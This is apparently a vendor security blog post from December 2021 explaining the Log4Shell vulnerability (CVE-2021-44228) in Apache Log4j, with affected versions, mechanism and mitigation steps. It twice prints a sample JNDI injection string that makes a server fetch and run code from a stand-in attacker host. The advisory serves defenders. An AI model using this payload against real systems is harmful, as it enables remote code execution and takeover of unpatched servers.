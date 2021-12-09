The new Log4Shell could be the worst software vulnerability ever

December 2021 by Zbigniew Banach, Invicti

Thousands of Java applications across the world are wide open to remote code execution attacks targeting the Log4j library. This post summarizes what we know so far about the Log4Shell vulnerability, how you can mitigate it, and what it means for cybersecurity here and now.

Issue:

Remote code execution (RCE) vulnerability in the Apache Log4j library for Java

Name:

CVE-2021-44228

Vulnerable versions:

Log4j 2.0 to 2.14.1

Patched Versions

Log4j 2.15.0 or newer

Severity:

Highly critical

Scale:

Global

Affected software:

All Java applications and frameworks that depend on the vulnerable library

First reported:

Dec 9th, 2021

Remediation:

Patch immediately to Log4j v2.15.0 (or newer) or apply temporary mitigation until patched

Netsparker by Invicti does not use Log4j, and we do not ship it with our products. However, if you are running a tomcat server, you may have configured it to route logging and tracing information through Log4j. If you have Log4j installed, we recommend immediately upgrading it to version 2.15.0 or newer.

How to exploit CVE-2021-44228

The vulnerability is high-impact yet extremely easy to exploit. The attacker simply needs to prepare a malicious Java file, put it on a server they control, and include the following string in any data that will be logged by the application server:

$jndi:ldap://attackers-server.com/malicious-java-file

When the vulnerable server logs this string, Log4j will retrieve and execute Java code from an attacker-controlled server, allowing arbitrary code execution. If the code is a remote shell, the attacker will obtain a local shell with the privileges of the system user running the vulnerable application. Who is affected by CVE-2021-44228

Considering that servers log many types of data, the attack surface is massive and includes headers as well as more visible inputs. Log4j is used by many popular Java application frameworks and packages, such as Struts, Hadoop, Elasticsearch, Grails, Kafka, and more. This means the vulnerability is embedded deeply not only in Java-based web applications but also in hundreds of thousands of enterprise apps.

Quite simply, if you have a vulnerable Log4j version anywhere in your live Java environment, you are at risk of remote code execution (RCE). Log4Shell explained

CVE-2021-44228 is a prime example of how several seemingly innocent or only slightly insecure features can be stacked into a devastating vulnerability:

Apart from plain text, Log4j also supports variables for easily inserting additional data into logs, such as timestamps or software versions.

These variables can include calls via JNDI (Java Naming and Directory Interface), for example to retrieve a user name from a central directory to put it in the log. LDAP is among the supported directory protocols (though others will also work for the attack).

Just in case this target data is too big for an LDAP response, you can also provide an external URL as the data source.

While this has nothing to do with logging, it so happens that JNDI can be used to retrieve not only text but also other data, for example stored application objects to be loaded and recreated.

Looking again at the sample exploit string, you can see how combining these four features can lead to remote code execution through JNDI injection:

$jndi:ldap://attackers-server.com/malicious-java-file

The attacker puts this string somewhere where it will be logged by the server – a request header, host name, device name, or any number of other places. The server asks Log4j to log this string. Log4j sees a variable with a JNDI call referring to an LDAP resource, in this case a Java class file. It then retrieves the file from the attacker’s server and deserializes it to recreate the Java class that it contains. And if that class is a remote shell, commiserations – you’ve just been hacked.

How to mitigate CVE-2021-44228

A fix is already available, so the recommended course of action is to update to Log4j 2.15.0 (or newer) immediately. If that is not possible at the moment, you have a few options for temporary mitigation by disabling JNDI lookups, depending on the version:

2.10 or above: Set the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true and restart your application.

2.7 to 2.14.1: Change all your logging patterns from %m to %mnolookups.

2.0 to 2.10: Remove the vulnerable JndiLookup class from your classpath or replace it with a blank or fixed version.

Our security researchers are already working on a security check to detect this vulnerability in web applications – we will update the post when this is released.

What this means for the future of application development

Looking beyond the current global rush to patch the Log4Shell vulnerability, having a robust and multi-layer approach to security continues to be the best strategy to protect your company from future threats.